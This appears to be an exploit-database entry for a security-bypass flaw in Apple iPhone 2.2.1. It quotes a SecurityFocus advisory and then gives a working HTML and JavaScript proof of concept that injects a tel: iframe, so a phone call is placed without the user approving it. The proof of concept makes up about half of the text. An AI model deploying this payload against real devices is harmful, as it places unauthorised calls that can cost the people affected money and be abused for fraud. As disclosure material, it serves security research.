Apple iPhone 2.2.1 - Call Approval Dialog Security Bypass (2)

source: https://www.securityfocus.com/bid/35425/info
 
Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically.
 
Successfully exploiting this issue may allow attackers to bypass the Mail's call-approval dialog and place a call automatically from a vulnerable device.
 
NOTE: This issue was previously covered in BID 35414 (Apple iPhone and iPod touch Prior to Version 3.0 Multiple Vulnerabilities), but has been assigned its own record to better document it.
 
<html> <head> <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner</title> <meta http-equiv="refresh" content="0; URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt"> </head> <body> <script lang=javascript> function a() { document.write("<iframe src=\"tel:+12345\" WIDTH=50 HEIGHT=10></iframe>"); } setTimeout("a()", 100); </script> </body> </html>